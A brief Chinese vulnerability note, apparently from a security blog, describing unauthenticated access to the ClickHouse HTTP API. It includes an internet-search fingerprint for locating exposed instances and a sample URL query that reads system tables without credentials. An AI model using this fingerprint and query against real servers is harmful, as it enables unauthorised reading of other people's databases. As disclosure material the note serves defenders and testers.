ClickHouse API 数据库接口存在未授权访问漏洞,攻击者通过漏洞可以执行任意SQL命令获取数据库数据
ClickHouse
"ClickHouse" && body="ok"
登录页面
执行SQL语句
/?query=SELECT%20*%20FROM%20system.query_thread_log%20LIMIT%201%20FORMAT%20Vertical
456 篇文章
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!